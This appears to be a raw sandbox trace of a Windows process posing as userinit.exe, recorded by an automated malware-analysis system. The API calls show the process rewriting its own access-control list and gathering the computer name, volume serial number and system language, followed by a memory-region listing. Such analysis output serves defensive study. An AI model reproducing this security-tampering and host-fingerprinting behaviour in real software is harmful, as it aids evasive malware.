[0149.912] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0149.912] GetProcAddress (hModule=0x75370000, lpProcName="CloseHandle") returned 0x753bca7c
[0149.912] CloseHandle (hObject=0x1d0) returned 1
[0149.912] ConvertStringSidToSidA () returned 0x1
[0149.912] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7fa54, pSourceSid=0x646f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000) | out: pDestinationSid=0x2a7fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0149.912] IsValidSid (pSid=0x2a7fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0149.912] ConvertSidToStringSidA () returned 0x1
[0149.912] LocalFree (hMem=0x646f58) returned 0x0
[0149.912] LocalFree (hMem=0x646f40) returned 0x0
[0149.913] ConvertStringSidToSidA () returned 0x1
[0149.913] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7fae0, pSourceSid=0x646f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000) | out: pDestinationSid=0x2a7fae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0149.913] IsValidSid (pSid=0x2a7fae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0149.913] ConvertSidToStringSidA () returned 0x1
[0149.913] LocalFree (hMem=0x646f58) returned 0x0
[0149.913] LocalFree (hMem=0x646f40) returned 0x0
[0149.913] ConvertStringSidToSidA () returned 0x1
[0149.913] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7fbfc, pSourceSid=0x646f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000) | out: pDestinationSid=0x2a7fbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0149.913] IsValidSid (pSid=0x2a7fbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0149.913] ConvertSidToStringSidA () returned 0x1
[0149.913] LocalFree (hMem=0x646f58) returned 0x0
[0149.913] LocalFree (hMem=0x646f40) returned 0x0
[0149.913] ConvertStringSidToSidA () returned 0x1
[0149.913] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7fc8c, pSourceSid=0x646f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000) | out: pDestinationSid=0x2a7fc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0149.913] IsValidSid (pSid=0x2a7fc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0149.913] ConvertSidToStringSidA () returned 0x1
[0149.913] LocalFree (hMem=0x646f58) returned 0x0
[0149.913] LocalFree (hMem=0x646f40) returned 0x0
[0149.913] ConvertStringSidToSidA () returned 0x1
[0149.913] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7fd1c, pSourceSid=0x646f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000) | out: pDestinationSid=0x2a7fd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0149.913] IsValidSid (pSid=0x2a7fd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0149.913] ConvertSidToStringSidA () returned 0x1
[0149.913] LocalFree (hMem=0x646f58) returned 0x0
[0149.913] LocalFree (hMem=0x646f40) returned 0x0
[0149.913] GetCurrentProcessId () returned 0x734
[0149.913] OpenProcess (dwDesiredAccess=0x60000, bInheritHandle=0, dwProcessId=0x734) returned 0x1d0
[0149.914] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0149.914] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityInfo") returned 0x76dab3e4
[0149.914] GetSecurityInfo () returned 0x0
[0149.917] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0149.917] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorControl") returned 0x76daaddf
[0149.917] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x640f28, pControl=0x18e852, lpdwRevision=0x18e84c | out: pControl=0x18e852, lpdwRevision=0x18e84c) returned 1
[0149.918] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0149.918] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorOwner") returned 0x76daadf7
[0149.918] GetSecurityDescriptorOwner (in: pSecurityDescriptor=0x640f28, pOwner=0x18e848, lpbOwnerDefaulted=0x18e83c | out: pOwner=0x18e848*=0x0, lpbOwnerDefaulted=0x18e83c) returned 1
[0149.918] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0149.918] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorGroup") returned 0x76daae27
[0149.918] GetSecurityDescriptorGroup (in: pSecurityDescriptor=0x640f28, pGroup=0x18e848, lpbGroupDefaulted=0x18e83c | out: pGroup=0x18e848*=0x0, lpbGroupDefaulted=0x18e83c) returned 1
[0149.918] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0149.918] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorDacl") returned 0x76db41a6
[0149.918] GetSecurityDescriptorDacl (in: pSecurityDescriptor=0x640f28, lpbDaclPresent=0x18e840, pDacl=0x18e834, lpbDaclDefaulted=0x18e83c | out: lpbDaclPresent=0x18e840, pDacl=0x18e834, lpbDaclDefaulted=0x18e83c) returned 1
[0149.918] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0149.919] GetProcAddress (hModule=0x76da0000, lpProcName="IsValidAcl") returned 0x76da8523
[0149.919] IsValidAcl (pAcl=0x640f3c) returned 1
[0149.919] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0149.919] GetProcAddress (hModule=0x76da0000, lpProcName="GetAce") returned 0x76db45f0
[0149.919] GetAce (in: pAcl=0x640f3c, dwAceIndex=0x0, pAce=0x18e6d4 | out: pAce=0x18e6d4*=0x640f44) returned 1
[0149.919] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7fe74, pSourceSid=0x640f4c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a7fe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0149.919] IsValidSid (pSid=0x2a7fe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0149.919] ConvertSidToStringSidA () returned 0x1
[0149.919] LocalFree (hMem=0x647018) returned 0x0
[0149.919] GetAce (in: pAcl=0x640f3c, dwAceIndex=0x1, pAce=0x18e6d4 | out: pAce=0x18e6d4*=0x640f5c) returned 1
[0149.919] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7ff60, pSourceSid=0x640f64*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x2a7ff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0149.919] IsValidSid (pSid=0x2a7ff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0149.919] ConvertSidToStringSidA () returned 0x1
[0149.919] LocalFree (hMem=0x647018) returned 0x0
[0149.919] GetAce (in: pAcl=0x640f3c, dwAceIndex=0x2, pAce=0x18e6d4 | out: pAce=0x18e6d4*=0x640f70) returned 1
[0149.919] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a729c0, pSourceSid=0x640f78*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0)) | out: pDestinationSid=0x2a729c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0149.919] IsValidSid (pSid=0x2a729c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0149.919] ConvertSidToStringSidA () returned 0x1
[0149.919] LocalFree (hMem=0x647018) returned 0x0
[0149.920] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0149.920] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorSacl") returned 0x76db4608
[0149.920] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x640f28, lpbSaclPresent=0x18e844, pSacl=0x18e838, lpbSaclDefaulted=0x18e83c | out: lpbSaclPresent=0x18e844, pSacl=0x18e838, lpbSaclDefaulted=0x18e83c) returned 1
[0149.920] LocalFree (hMem=0x640f28) returned 0x0
[0149.920] IsValidSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0149.920] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0149.920] GetProcAddress (hModule=0x76da0000, lpProcName="GetLengthSid") returned 0x76db413b
[0149.920] GetLengthSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0149.920] GetLastError () returned 0x0
[0149.920] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0149.920] GetProcAddress (hModule=0x75370000, lpProcName="GlobalAlloc") returned 0x753b9ce1
[0149.920] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0149.920] GetProcAddress (hModule=0x76da0000, lpProcName="InitializeAcl") returned 0x76db45cd
[0149.920] InitializeAcl (in: pAcl=0x647fa8, nAclLength=0x1c, dwAclRevision=0x2 | out: pAcl=0x647fa8) returned 1
[0149.921] IsValidSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0149.921] GetLengthSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0149.921] GetLastError () returned 0x0
[0149.921] IsValidSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0149.921] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0149.921] GetProcAddress (hModule=0x75370000, lpProcName="SetLastError") returned 0x753bbb08
[0149.921] SetLastError (dwErrCode=0x0)
[0149.921] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0149.921] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthorityCount") returned 0x76db0e0c
[0149.921] GetSidSubAuthorityCount (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2a7f615
[0149.921] GetLastError () returned 0x0
[0149.921] IsValidSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0149.921] SetLastError (dwErrCode=0x0)
[0149.921] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0149.921] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidIdentifierAuthority") returned 0x76daa935
[0149.921] GetSidIdentifierAuthority (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2a7f616
[0149.922] GetLastError () returned 0x0
[0149.922] IsValidSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0149.922] IsValidSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0149.922] SetLastError (dwErrCode=0x0)
[0149.922] GetSidSubAuthorityCount (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2a7f615
[0149.922] GetLastError () returned 0x0
[0149.922] SetLastError (dwErrCode=0x0)
[0149.922] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0149.922] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthority") returned 0x76db0e24
[0149.922] GetSidSubAuthority (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), nSubAuthority=0x0) returned 0x2a7f61c
[0149.922] GetLastError () returned 0x0
[0149.922] IsValidSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0149.922] GetLengthSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0149.922] GetLastError () returned 0x0
[0149.922] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0149.922] GetProcAddress (hModule=0x76da0000, lpProcName="AddAce") returned 0x76daae0f
[0149.922] AddAce (in: pAcl=0x647fa8, dwAceRevision=0x2, dwStartingAceIndex=0xffffffff, pAceList=0x632f90, nAceListLength=0x14 | out: pAcl=0x647fa8) returned 1
[0149.922] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0149.923] GetProcAddress (hModule=0x75370000, lpProcName="GlobalFree") returned 0x753b9cf9
[0149.923] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0149.923] GetProcAddress (hModule=0x76da0000, lpProcName="SetSecurityInfo") returned 0x76da9edf
[0149.923] SetSecurityInfo () returned 0x0
[0149.923] CloseHandle (hObject=0x1d0) returned 1
[0149.923] GetComputerNameA (in: lpBuffer=0x2a7fd84, nSize=0x18eb0c | out: lpBuffer="CRH2YWU7", nSize=0x18eb0c) returned 1
[0149.923] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e9f8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0149.923] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18eaf4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x18eb08, lpMaximumComponentLength=0x18eb04, lpFileSystemFlags=0x18eb00, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18eb08*=0x90c08a66, lpMaximumComponentLength=0x18eb04*=0xff, lpFileSystemFlags=0x18eb00*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0149.924] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18ea00, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0149.924] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18eaf4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x18eb08, lpMaximumComponentLength=0x18eb04, lpFileSystemFlags=0x18eb00, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18eb08*=0x90c08a66, lpMaximumComponentLength=0x18eb04*=0xff, lpFileSystemFlags=0x18eb00*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0149.924] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18ea00, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0149.924] VirtualAlloc (lpAddress=0x2a80000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2a80000
[0149.924] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18eaf4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x18eb08, lpMaximumComponentLength=0x18eb04, lpFileSystemFlags=0x18eb00, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18eb08*=0x90c08a66, lpMaximumComponentLength=0x18eb04*=0xff, lpFileSystemFlags=0x18eb00*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0149.925] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e9f8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0149.925] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18eaf4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x18eb08, lpMaximumComponentLength=0x18eb04, lpFileSystemFlags=0x18eb00, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18eb08*=0x90c08a66, lpMaximumComponentLength=0x18eb04*=0xff, lpFileSystemFlags=0x18eb00*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0149.925] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e9f8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0149.925] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18eaf4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x18eb08, lpMaximumComponentLength=0x18eb04, lpFileSystemFlags=0x18eb00, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18eb08*=0x90c08a66, lpMaximumComponentLength=0x18eb04*=0xff, lpFileSystemFlags=0x18eb00*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0149.925] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e9f8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0149.925] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18eaf4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x18eb08, lpMaximumComponentLength=0x18eb04, lpFileSystemFlags=0x18eb00, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18eb08*=0x90c08a66, lpMaximumComponentLength=0x18eb04*=0xff, lpFileSystemFlags=0x18eb00*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0149.926] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e9f8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0149.926] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18eaf4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x18eb08, lpMaximumComponentLength=0x18eb04, lpFileSystemFlags=0x18eb00, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18eb08*=0x90c08a66, lpMaximumComponentLength=0x18eb04*=0xff, lpFileSystemFlags=0x18eb00*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0149.926] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e9f8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0149.926] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18eaf4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x18eb08, lpMaximumComponentLength=0x18eb04, lpFileSystemFlags=0x18eb00, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18eb08*=0x90c08a66, lpMaximumComponentLength=0x18eb04*=0xff, lpFileSystemFlags=0x18eb00*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0149.926] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e9f8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0149.926] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18eaf4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x18eb08, lpMaximumComponentLength=0x18eb04, lpFileSystemFlags=0x18eb00, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18eb08*=0x90c08a66, lpMaximumComponentLength=0x18eb04*=0xff, lpFileSystemFlags=0x18eb00*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0149.926] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e9f8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0149.926] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18eaf4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x18eb08, lpMaximumComponentLength=0x18eb04, lpFileSystemFlags=0x18eb00, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18eb08*=0x90c08a66, lpMaximumComponentLength=0x18eb04*=0xff, lpFileSystemFlags=0x18eb00*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0149.927] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e9f8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0149.927] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18eaf4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x18eb08, lpMaximumComponentLength=0x18eb04, lpFileSystemFlags=0x18eb00, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18eb08*=0x90c08a66, lpMaximumComponentLength=0x18eb04*=0xff, lpFileSystemFlags=0x18eb00*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0149.927] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e9f8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0149.927] GetSystemDefaultLangID () returned 0x620409
[0149.927] VerLanguageNameA (in: wLang=0x409, szLang=0x18eaac, cchLang=0x64 | out: szLang="English (United States)") returned 0x17
[0149.928] ExitProcess (uExitCode=0x0)
Thread:
id = 272
os_tid = 0x2ac
Thread:
id = 273
os_tid = 0x548
Process:
id = "42"
image_name = "userinit.exe"
filename = "c:\\windows\\system32\\userinit.exe"
page_root = "0x7f1be820"
os_pid = "0x174"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "25"
os_parent_pid = "0xf18"
cmd_line = "\"C:\\Windows\\System32\\userinit.exe\""
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 4738
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 4739
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 4740
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 4741
start_va = 0x210000
end_va = 0x24ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 4742
start_va = 0x400000
end_va = 0x462fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 4743
start_va = 0xd80000
end_va = 0xd88fff
entry_point = 0xd80000
region_type = mapped_file
name = "userinit.exe"
filename = "\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")
Region:
id = 4744
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 4745
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
